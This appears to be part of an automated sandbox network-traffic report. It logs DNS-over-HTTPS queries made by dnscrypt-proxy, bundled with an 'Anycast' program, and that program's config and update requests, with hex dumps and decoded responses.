                                                                                                                            2024-03-12 15:32:47 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 b4 af 34 7c 76 a8 72 20 c1 8c 0e 9a 90 ba c4 f5
                                                                                                                            Data Ascii: )4|vr
                                                                                                                            2024-03-12 15:32:47 UTC645INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:47 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            CF-Ray: 8634d6c66f844246-EWR
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZyzJ7sbd%2BZj1MRblXvM50mFsRutjpO9KC597%2BzH%2F%2B8JHeU7xi6fQQCKSbjKyNz%2BILJxS5poLoSKXvbIWbrJZNOWnI3odY5QV%2FQ%2BeuovPu7eUwdKTxBPH4zipVeOrxqeot3a2O55vknvmTU9ZWDU5aA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                            Server: cloudflare
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            2024-03-12 15:32:47 UTC468INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 07 c9 46 00 14 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 07 c9 46 00 04 01 62 c0 1e 00 00 02 00 01 00 07 c9 46 00 04 01 63 c0 1e 00 00 02 00 01 00 07 c9 46 00 04 01 64 c0 1e 00 00 02 00 01 00 07 c9 46 00 04 01 65 c0 1e 00 00 02 00 01 00 07 c9 46 00 04 01 66 c0 1e 00 00 02 00 01 00 07 c9 46 00 04 01 67 c0 1e 00 00 02 00 01 00 07 c9 46 00 04 01 68 c0 1e 00 00 02 00 01 00 07 c9 46 00 04 01 69 c0 1e 00 00 02 00 01 00 07 c9 46 00 04 01 6a c0 1e 00 00 02 00 01 00 07 c9 46 00 04 01 6b c0 1e 00 00 02 00 01 00 07 c9 46 00 04 01 6c c0 1e 00 00 02 00 01 00 07 c9 46 00 04 01 6d c0 1e 00 00 29 04 d0 00 00 00 00 00 e5 00 0c 00 e1 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: Faroot-serversnetFbFcFdFeFfFgFhFiFjFkFlFm)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.2.549737172.64.134.394437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:48 UTC275OUTPOST /dns-query?body_hash=385d30b2b39c02b3732e8eafe76f3b44a4916013e03127fcf6b6131520bc5a44 HTTP/1.1
                                                                                                                            Host: sky.rethinkdns.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:32:48 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 72 73 77 71 6f 69 6b 62 73 6d 70 79 76 71 7a 62 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 1e c0 74 8b 64 e1 81 8b 62 03 bc 19 a2 14 ca 8c
                                                                                                                            Data Ascii: rswqoikbsmpyvqzbtestdnscrypt)tdb
                                                                                                                            2024-03-12 15:32:48 UTC637INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:48 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            CF-Ray: 8634d6c91c5a3338-EWR
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LO8VjUpx0zdf40VXorO74uR1cnYei7Ee%2Brfgxd1u8vw6zOz2v1qdgwdSvim1TPOyS9tNNcdaX50AxCRJOLWkcItk9g0EUvEWa6o1hHMuJqYfe33%2BoBStZfHs%2B9TD9Y1E3aIKmGHggE0Qu7iARfYpjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                            Server: cloudflare
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            2024-03-12 15:32:48 UTC468INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 72 73 77 71 6f 69 6b 62 73 6d 70 79 76 71 7a 62 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 01 51 80 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 01 4e 00 0c 01 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: rswqoikbsmpyvqzbtestdnscryptQ@aroot-serversnetnstldverisign-grscomxC:Q)NJ


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.2.54973995.179.131.824437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:48 UTC274OUTPOST /dns-query?body_hash=5735ac4be1c662def26216fc98254f5427b9d77985a0e42847d95a219638fb70 HTTP/1.1
                                                                                                                            Host: snoke.meganerd.nl
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:32:48 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 cb 92 56 8c e7 6c 33 0e 76 bb d3 8a a8 48 4c 22
                                                                                                                            Data Ascii: )Vl3vHL"
                                                                                                                            2024-03-12 15:32:49 UTC325INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:49 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 260
                                                                                                                            Connection: close
                                                                                                                            cache-control: max-age=71542, stale-if-error=86400, stale-while-revalidate=60
                                                                                                                            access-control-allow-origin: *
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                            2024-03-12 15:32:49 UTC260INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 01 17 76 00 14 01 6d 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 01 17 76 00 04 01 61 c0 1e 00 00 02 00 01 00 01 17 76 00 04 01 62 c0 1e 00 00 02 00 01 00 01 17 76 00 04 01 63 c0 1e 00 00 02 00 01 00 01 17 76 00 04 01 64 c0 1e 00 00 02 00 01 00 01 17 76 00 04 01 65 c0 1e 00 00 02 00 01 00 01 17 76 00 04 01 66 c0 1e 00 00 02 00 01 00 01 17 76 00 04 01 67 c0 1e 00 00 02 00 01 00 01 17 76 00 04 01 68 c0 1e 00 00 02 00 01 00 01 17 76 00 04 01 69 c0 1e 00 00 02 00 01 00 01 17 76 00 04 01 6a c0 1e 00 00 02 00 01 00 01 17 76 00 04 01 6b c0 1e 00 00 02 00 01 00 01 17 76 00 04 01 6c c0 1e 00 00 29 04 d0 00 00 00 00 00 15 00 0c 00 11 58 58 58 58 58 58 58 58 58 58 58 58
                                                                                                                            Data Ascii: vmroot-serversnetvavbvcvdvevfvgvhvivjvkvl)XXXXXXXXXXXX


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.2.54974095.179.131.824437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:49 UTC274OUTPOST /dns-query?body_hash=c8a5d38ebd340083324130c761f120a10365815b8ba401cf93820f2d472e1b82 HTTP/1.1
                                                                                                                            Host: snoke.meganerd.nl
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:32:49 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 78 6f 6f 64 6a 77 74 72 78 75 68 71 72 64 6d 79 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 d8 20 b4 2d 2e 99 7d c9 5b df 49 e9 bf 7f e4 c6
                                                                                                                            Data Ascii: xoodjwtrxuhqrdmytestdnscrypt) -.}[I
                                                                                                                            2024-03-12 15:32:49 UTC323INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:49 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 196
                                                                                                                            Connection: close
                                                                                                                            cache-control: max-age=257, stale-if-error=86400, stale-while-revalidate=60
                                                                                                                            access-control-allow-origin: *
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                            2024-03-12 15:32:49 UTC196INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 78 6f 6f 64 6a 77 74 72 78 75 68 71 72 64 6d 79 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 01 01 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 3e 00 0c 00 3a 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58
                                                                                                                            Data Ascii: xoodjwtrxuhqrdmytestdnscrypt@aroot-serversnetnstldverisign-grscomxC:Q)>:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.2.549742193.70.85.114437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:55 UTC199OUTGET /?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABAgfDFtmH4pThl8Z-RLHdij HTTP/1.1
                                                                                                                            Host: doh.bortzmeyer.fr
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:32:55 UTC47INHTTP/1.1 400 Bad Request
                                                                                                                            Connection: Close
                                                                                                                            2024-03-12 15:32:55 UTC147INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 54 68 69 73 20 73 65 72 76 65 72 20 69 6d 70 6c 65 6d 65 6e 74 73 20 52 46 43 20 38 34 38 34 20 2d 20 44 4e 53 20 51 75 65 72 69 65 73 20 6f 76 65 72 20 48 54 54 50 2c 20 61 6e 64 20 72 65 71 75 69 72 65 73 20 48 54 54 50 2f 32 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 73 65 63 74 69 6f 6e 20 35 2e 32 20 6f 66 20 74 68 65 20 52 46 43 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><body>This server implements RFC 8484 - DNS Queries over HTTP, and requires HTTP/2 in accordance with section 5.2 of the RFC.</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            16192.168.2.54974343.159.77.1994437824C:\Program Files (x86)\Anycast\Anycast.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:56 UTC261OUTPOST /config HTTP/1.1
                                                                                                                            Accept: application/json
                                                                                                                            AppPlatform: windows
                                                                                                                            AppVersion: 1.0
                                                                                                                            AppBuild: 24
                                                                                                                            AppLocale: en_US
                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                            Host: api.fengyunyizu.com
                                                                                                                            Content-Length: 2
                                                                                                                            Expect: 100-continue
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-03-12 15:32:56 UTC25INHTTP/1.1 100 Continue
                                                                                                                            2024-03-12 15:32:56 UTC2OUTData Raw: 7b 7d
                                                                                                                            Data Ascii: {}
                                                                                                                            2024-03-12 15:32:56 UTC474INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                            Keep-Alive: timeout=30
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:56 GMT
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            ETag: W/"ad-ZahunHZLJjIBz5GbYz2xYl4JOX0"
                                                                                                                            X-Qtl-Request-ID: 2b365193f923f2fb076504038e226f55
                                                                                                                            X-Via: 1.1 na-us-lax0-cache-0004 [200]
                                                                                                                            Server: QTL_Cache/1.2.15
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            X-Cache-Lookup: Cache Miss
                                                                                                                            Content-Length: 173
                                                                                                                            X-NWS-LOG-UUID: 6296671397471027311
                                                                                                                            Connection: close
                                                                                                                            X-Cache-Lookup: Cache Miss
                                                                                                                            2024-03-12 15:32:56 UTC173INData Raw: 7b 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 64 61 74 61 22 3a 7b 22 61 70 70 5f 63 6f 6e 66 69 67 22 3a 7b 22 73 75 70 70 6f 72 74 5f 63 68 61 74 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 61 6e 79 63 61 73 74 6a 73 71 2e 63 6f 6d 2f 3f 75 69 64 3d 7b 55 49 44 7d 26 65 6d 61 69 6c 3d 7b 45 4d 41 49 4c 7d 22 7d 2c 22 75 73 65 72 5f 69 70 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 31 39 34 22 2c 22 75 73 65 72 5f 63 6f 75 6e 74 72 79 5f 69 73 6f 5f 63 6f 64 65 22 3a 6e 75 6c 6c 7d 7d
                                                                                                                            Data Ascii: {"success":true,"data":{"app_config":{"support_chat_url":"https://support.anycastjsq.com/?uid={UID}&email={EMAIL}"},"user_ip":"191.96.227.194","user_country_iso_code":null}}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            17192.168.2.54974434.224.154.884437824C:\Program Files (x86)\Anycast\Anycast.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:57 UTC265OUTPOST /app_update HTTP/1.1
                                                                                                                            Accept: application/json
                                                                                                                            AppPlatform: windows
                                                                                                                            AppVersion: 1.0
                                                                                                                            AppBuild: 24
                                                                                                                            AppLocale: en_US
                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                            Host: api.jianghumeng.net
                                                                                                                            Content-Length: 2
                                                                                                                            Expect: 100-continue
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-03-12 15:32:57 UTC25INHTTP/1.1 100 Continue
                                                                                                                            2024-03-12 15:32:57 UTC2OUTData Raw: 7b 7d
                                                                                                                            Data Ascii: {}
                                                                                                                            2024-03-12 15:32:57 UTC474INHTTP/1.1 200 OK
                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                            Keep-Alive: timeout=30
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:57 GMT
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            ETag: W/"1a-pIPrt4esgEyEkX/w62Rnrj9XXdg"
                                                                                                                            X-Qtl-Request-ID: 0477c572424f9e21ddb534b24d5fe865
                                                                                                                            X-Via: 1.1 na-us-atl2-cache-0001 [200]
                                                                                                                            Server: QTL_Cache/1.2.15
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            X-Cache-Lookup: Cache Miss
                                                                                                                            Content-Length: 26
                                                                                                                            X-NWS-LOG-UUID: 17846251063410261633
                                                                                                                            Connection: close
                                                                                                                            X-Cache-Lookup: Cache Miss
                                                                                                                            2024-03-12 15:32:57 UTC26INData Raw: 7b 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 64 61 74 61 22 3a 7b 7d 7d
                                                                                                                            Data Ascii: {"success":true,"data":{}}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            18192.168.2.54974691.107.235.04437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:58 UTC278OUTPOST /nomen-quaesitum?body_hash=0a5ff82671be55e80ca4a3d14d63ccbe815fddf1f4fda7202a6fc355125b0543 HTTP/1.1
                                                                                                                            Host: www.tirapan.top
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:32:58 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 c4 e2 4d 03 50 ce 62 dd 35 66 a8 36 68 4e 1c 77
                                                                                                                            Data Ascii: )MPb5f6hNw
                                                                                                                            2024-03-12 15:32:59 UTC861INHTTP/1.1 200 OK
                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                            Access-Control-Allow-Methods: GET, HEAD, OPTIONS, POST
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Max-Age: 3600
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                            Cache-Control: private, max-age=13995
                                                                                                                            Content-Length: 232
                                                                                                                            Content-Security-Policy: frame-ancestors 'self'
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:58 GMT
                                                                                                                            Expires: Tue, 12 Mar 2024 19:26:13 GMT
                                                                                                                            Last-Modified: Tue, 12 Mar 2024 15:32:58 GMT
                                                                                                                            Permissions-Policy: interest-cohort=()
                                                                                                                            Server: Caddy
                                                                                                                            Server: DNS-over-HTTPS/2.3.4 (+https://github.com/m13253/dns-over-https)
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                            Vary: Accept
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Powered-By: DNS-over-HTTPS/2.3.4 (+https://github.com/m13253/dns-over-https)
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:32:59 UTC232INData Raw: ca fe 81 80 00 01 00 07 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 36 ab 00 12 03 6e 73 34 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 00 00 02 00 01 00 00 36 ab 00 12 03 6e 73 32 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 00 00 02 00 01 00 00 36 ab 00 12 03 6e 73 38 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 00 00 02 00 01 00 00 36 ab 00 12 03 6e 73 36 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 00 00 02 00 01 00 00 36 ab 00 13 04 6e 73 31 31 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 00 00 02 00 01 00 00 36 ab 00 12 03 6e 73 35 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 00 00 02 00 01 00 00 36 ab 00 12 03 6e 73 39 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: 6ns4opennicglue6ns2opennicglue6ns8opennicglue6ns6opennicglue6ns11opennicglue6ns5opennicglue6ns9opennicglue)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            19192.168.2.54974891.107.235.04437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:59 UTC278OUTPOST /nomen-quaesitum?body_hash=d74a42e2377bb59aac13191391e0a5f9d0eb3371b2ec33de18796c0a048e6867 HTTP/1.1
                                                                                                                            Host: www.tirapan.top
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:32:59 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 6d 63 6e 62 6a 67 67 76 74 71 79 6b 6d 72 6d 6d 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 79 c8 30 0c 62 10 d0 96 00 d5 30 ae 22 d8 d7 97
                                                                                                                            Data Ascii: mcnbjggvtqykmrmmtestdnscrypt)y0b0"
                                                                                                                            2024-03-12 15:32:59 UTC860INHTTP/1.1 200 OK
                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                            Access-Control-Allow-Methods: GET, HEAD, OPTIONS, POST
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Max-Age: 3600
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                            Cache-Control: private, max-age=1811
                                                                                                                            Content-Length: 144
                                                                                                                            Content-Security-Policy: frame-ancestors 'self'
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:59 GMT
                                                                                                                            Expires: Tue, 12 Mar 2024 16:03:10 GMT
                                                                                                                            Last-Modified: Tue, 12 Mar 2024 15:32:59 GMT
                                                                                                                            Permissions-Policy: interest-cohort=()
                                                                                                                            Server: Caddy
                                                                                                                            Server: DNS-over-HTTPS/2.3.4 (+https://github.com/m13253/dns-over-https)
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                            Vary: Accept
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Powered-By: DNS-over-HTTPS/2.3.4 (+https://github.com/m13253/dns-over-https)
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:32:59 UTC144INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 6d 63 6e 62 6a 67 67 76 74 71 79 6b 6d 72 6d 6d 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 07 13 00 3f 03 6e 73 30 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 0a 68 6f 73 74 6d 61 73 74 65 72 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 78 a4 43 ee 00 00 07 08 00 00 03 84 00 09 3a 80 00 00 0e 10 00 00 29 04 d0 00 00 00 00 00 0b 00 08 00 07 00 01 18 00 bf 60 e3
                                                                                                                            Data Ascii: mcnbjggvtqykmrmmtestdnscrypt?ns0opennicgluehostmasteropennicgluexC:)`


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            20192.168.2.549749213.196.191.964437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:00 UTC281OUTPOST /dns-query?body_hash=06755ce2d2984c7850d853afcb3425d160ff88080665583e8c7df96d9820f2ee HTTP/1.1
                                                                                                                            Host: ibksturm.synology.me:443
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:00 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 75 7f 6d 42 28 a6 ea 3a 77 fd 80 88 7d 33 84 07
                                                                                                                            Data Ascii: )umB(:w}3
                                                                                                                            2024-03-12 15:33:01 UTC310INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:01 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 431
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            2024-03-12 15:33:01 UTC431INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 00 1e 00 14 01 67 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 00 1e 00 14 01 68 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 00 1e 00 14 01 69 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 00 1e 00 14 01 6a 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 00 1e 00 14 01 6b 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 00 1e 00 14 01 6c 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 00 1e 00 14 01 6d 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 00 1e 00 14 01 61 0c 72 6f 6f 74 2d 73 65
                                                                                                                            Data Ascii: groot-serversnethroot-serversnetiroot-serversnetjroot-serversnetkroot-serversnetlroot-serversnetmroot-serversnetaroot-se


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            21192.168.2.549750213.196.191.964437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:01 UTC281OUTPOST /dns-query?body_hash=2855aa0d7c559149df29de1f3c20565e5b35a37815e14c92f5708d9b2f4e9d62 HTTP/1.1
                                                                                                                            Host: ibksturm.synology.me:443
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:01 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 61 79 6c 6e 61 6c 65 70 69 71 74 74 61 66 77 6a 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 67 67 28 36 7d 84 04 7d 70 27 42 37 7c a3 73 f0
                                                                                                                            Data Ascii: aylnalepiqttafwjtestdnscrypt)gg(6}}p'B7|s
                                                                                                                            2024-03-12 15:33:02 UTC310INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:02 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 134
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
